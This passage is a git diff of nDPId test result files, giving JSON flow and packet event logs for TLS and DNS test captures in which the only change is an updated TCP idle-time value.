CN=images.moxy.windowsphone-int.com, CN=*.wlxrsu-int.com, CN=images.partner.windowsphone-int.com, CN=images.partner.windowsphone.com, CN=*.jp.msn.com, CN=*.c3scs.jp.msn.com, 
CN=*.aspnetcdn.com, CN=*.hotmail.com, CN=*.partner-df.windowsphone-int.com, CN=*.s-msn.com, CN=*.live-int.net, CN=*.windowsphone-int.com, CN=*.windowsphone.com, CN=*.partner-pc.windowsphone-int.com, CN=*.manage.microsoft.com, CN=*.vo.msecnd.net","fingerprint":"FF:BF:9A:69:8F:C8:44:FF:89:F2:61:49:A7:D1:9A:98:DE:32:84:3B"}} +01038{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6881,"flow_avg_l4_payload_len":1146,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"213.199.149.251","src_port":31337,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"tls-rdn-extract.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-data-len":6881,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":946681200000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets 
captured/processed: 6/6 diff --git a/test/results/tls_alert.pcap.out b/test/results/tls_alert.pcap.out index 84637d4a9..ec200aa9b 100644 --- a/test/results/tls_alert.pcap.out +++ b/test/results/tls_alert.pcap.out 
@@ -1,11 +1,11 @@ 00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_alert.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1628259176203} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1628259176203,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1628259176203,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAABAAABAAEAGtpPAqAHAwKgBFPa2AbvtIEkOAAAAALAC\/\/9MagAAAgQFtAEDAwUBAQgKE9Ij+wAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1628259176203,"pkt":"oM7IELEuAICPmq69CABFAAA8AABAAEAGtpfAqAEUwKgBwAG79rbEoc1F7SBJD6AScSBz9QAAAgQFtAQCCAoAseWtE9Ij+wEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1628259176203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAAA0AABAAEAGtp\/AqAHAwKgBFPa2AbvtIEkPxKHNRoAQEBUDzQAAAQEIChPSI\/sAseWt"} 
-01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1628259176203,"flow_last_seen":1628259176206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1628259176206,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1628259176203,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1628259176203,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAABAAABAAEAGtpPAqAHAwKgBFPa2AbvtIEkOAAAAALAC\/\/9MagAAAgQFtAEDAwUBAQgKE9Ij+wAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1628259176203,"pkt":"oM7IELEuAICPmq69CABFAAA8AABAAEAGtpfAqAEUwKgBwAG79rbEoc1F7SBJD6AScSBz9QAAAgQFtAQCCAoAseWtE9Ij+wEDAwc="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1628259176203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1628259176203,"pkt":"AICPmq69oM7IELEuCABFAAA0AABAAEAGtp\/AqAHAwKgBFPa2AbvtIEkPxKHNRoAQEBUDzQAAAQEIChPSI\/sAseWt"} +01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1628259176203,"flow_last_seen":1628259176204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1628259176204,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google-analytics.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1628259176203,"flow_last_seen":1628259176206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1628259176206,"l3_proto":"ip4","src_ip":"192.168.1.192","dst_ip":"192.168.1.20","src_port":63158,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":11,"source":"tls_alert.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":11,"total-skipped-flows":0,"total-l4-data-len":206,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1628259176206} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 11/11 diff --git a/test/results/tls_certificate_too_long.pcap.out b/test/results/tls_certificate_too_long.pcap.out index 904d4b6ea..1b4ce350c 100644 --- a/test/results/tls_certificate_too_long.pcap.out +++ b/test/results/tls_certificate_too_long.pcap.out 
@@ -1,12 +1,12 @@ 00475{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1626168074745} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074745,"flow_last_seen":1626168074745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168074745,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1626168074745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074745,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoYkwAAEAGDJLAqAF5NJUVPM4KAbsrlJN\/t5VLK1AQEAACSAAA"} -00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074926,"flow_last_seen":1626168074926,"flow_idle_time":7440000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":394,"midstream":1,"thread_ts_msec":1626168074926,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1626168074926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168074926,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB\/6QAAAQEICj3R7oXM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1626168074928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074928,"pkt":"8BiYFWV8WNVuaKQACABFAAAohXJAAGYGg2s0lRU8wKgBeQG7zgq3lUsrK5STgFAQCAUKQgAA"} 
-01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1626168075218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168075218,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB+xwAAAQEICj3R76fM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1626168075586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168075586,"pkt":"8BiYFWV86qnehSPOCABFAAA0AABAAEAGtm\/AqAGLwKgBedhHzfFqV75MQuV5fYAQD\/PHGQAAAQEICszblug90e6F"} 
+00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074745,"flow_last_seen":1626168074745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1626168074745,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.149.21.60","src_port":52746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1626168074745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074745,"pkt":"WNVuaKQA8BiYFWV8CABFAAAoYkwAAEAGDJLAqAF5NJUVPM4KAbsrlJN\/t5VLK1AQEAACSAAA"} +00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168074926,"flow_last_seen":1626168074926,"flow_idle_time":7560000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":394,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":394,"midstream":1,"thread_ts_msec":1626168074926,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1626168074926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168074926,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB\/6QAAAQEICj3R7oXM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1626168074928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1626168074928,"pkt":"8BiYFWV8WNVuaKQACABFAAAohXJAAGYGg2s0lRU8wKgBeQG7zgq3lUsrK5STgFAQCAUKQgAA"} 
+01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1626168075218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":460,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":460,"pkt_l4_len":426,"thread_ts_msec":1626168075218,"pkt":"6qnehSPO8BiYFWV8CABFAAG+AABAAEAGtOXAqAF5wKgBi83x2EdC5Xfzale+TIAYCAB+xwAAAQEICj3R76fM25T9CAABhld\/rqUKPhy+Qdwsnn\/388U2j8HvqfZt7NKn2y6gWIcL98SaPzBZIwnSs72oLTvvlguqUQlKWlLufOGjngWKIhcWUeQoSkpLjQvNSSv7gYi1QDJcZ1YgY8f+7jRqbAl+a\/BPH77qdzC4CNO+ZTGhDrsBC1e4j+Om2CDF7lIs20rukyDxPakgZrQyR46qumvSZQK+8Ppus7xBRLVTFZ\/FLMsl9PGCAEbWgCbmE+w3QXxCCveq9PGBZhO0SuogOJTbCwQu9OkRw87OZldYZJp97qFOjNzQCbVznEIqCLtpav3x8Ag0jVTZabHaayJ+x1z+e8rrZGIX7\/xkSnTBSKyCqMjx2NYF\/5qZhXz4yht89P+8mINNVQ551w864eTaFTcnaSMT0rXqSgtRPoy81ZDM+FmYMt0yLvMJCWWLMV4kGp8LOoIV+I4ULnhXqgmK8DvlRJvF4FU+NKoY88FXQH9DXPUqmsZnrKy4vytUEpb2L3gzXD\/pZCo9RlP7UlcWSVAiGiSkdeXqHQ=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1626168075586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168075586,"pkt":"8BiYFWV86qnehSPOCABFAAA0AABAAEAGtm\/AqAGLwKgBedhHzfFqV75MQuV5fYAQD\/PHGQAAAQEICszblug90e6F"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1626168075664,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168075664,"pkt":"WNVuaKQA8BiYFWV8CABFAABI5dsAAEARwpjAqAF5CAgICMwbADUANLpX5f8BAAABAAAAAAAAAzEyMQExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} 00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168075664,"flow_last_seen":1626168075664,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1626168075664,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":52251,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"121.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -44,21 +44,21 @@ 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077441,"flow_last_seen":1626168077441,"flow_idle_time":180000,"flow_min_l4_payload_len":73,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1626168077441,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65492,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 